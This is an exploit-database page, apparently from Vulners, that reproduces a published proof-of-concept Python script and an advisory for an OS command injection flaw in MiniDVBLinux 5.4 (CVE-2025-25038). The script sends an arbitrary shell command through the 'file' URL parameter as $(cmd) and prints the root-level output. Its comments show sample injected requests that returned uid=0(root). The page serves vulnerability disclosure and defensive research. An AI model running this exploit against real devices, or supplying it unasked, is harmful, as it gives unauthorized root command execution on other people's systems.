Vulners
Lucene search
MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | CVE-2025-25038 | 20 Jun 202522:10 | – | circl |
 | MiniDVBLinux 安全漏洞 | 20 Jun 202500:00 | – | cnnvd |
 | CVE-2025-25038 | 20 Jun 202518:36 | – | cve |
 | CVE-2025-25038 MiniDVBLinux Root Command Injection | 20 Jun 202518:36 | – | cvelist |
 | EUVD-2025-18780 | 3 Oct 202520:07 | – | euvd |
 | CVE-2025-25038 | 20 Jun 202519:15 | – | nvd |
 | CVE-2025-25038 | 20 Jun 202519:15 | – | osv |
 | PT-2025-26456 | 20 Jun 202500:00 | – | ptsecurity |
 | CVE-2025-25038 | 23 Jun 202508:39 | – | redhatcve |
 | VulnCheck KEV: CVE-2025-25038 | 20 Jun 202500:00 | – | vulncheck_kev |
10
<html><body><p>#!/usr/bin/env python3
#
#
# MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability
#
#
# Vendor: MiniDVBLinux
# Product web page: https://www.minidvblinux.de
# Affected version: <=5.4
#
# Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
# way to convert a standard PC into a Multi Media Centre based on the
# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
# Linux based Digital Video Recorder: Watch TV, Timer controlled
# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
# via browser, and a lot more. MLD strives to be as small as possible,
# modular, simple. It supports numerous hardware platforms, like classic
# desktops in 32/64bit and also various low power ARM systems.
#
# Desc: The application suffers from an OS command injection vulnerability.
# This can be exploited to execute arbitrary commands with root privileges.
#
# Tested on: MiniDVBLinux 5.4
# BusyBox v1.25.1
# Architecture: armhf, armhf-rpi2
# GNU/Linux 4.19.127.203 (armv7l)
# VideoDiskRecorder 2.4.6
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5717
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php
#
#
# 24.09.2022
#
import requests
import re,sys
#test case 001
#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT
#test case 004
#http://ip:8008/?site=about&name=blind&file=$(id)
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
#test case 005
#http://ip:8008/?site=about&name=blind&file=`id`
#cat: can't open 'uid=0(root)': No such file or directory
#cat: can't open 'gid=0(root)': No such file or directory
if len(sys.argv) < 3:
print('MiniDVBLinux 5.4 Command Injection PoC')
print('Usage: ./mldhd_root2.py [url] [cmd]')
sys.exit(17)
else:
url = sys.argv[1]
cmd = sys.argv[2]
req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')
outz = re.search('</p><pre>(.*?)</pre>',req.text,flags=re.S).group()
print(outz.replace('<pre>','').replace('</pre>',''))
</body></html>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Oct 2022 00:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.19.8
CVSS 49.3
EPSS0.29206
SSVC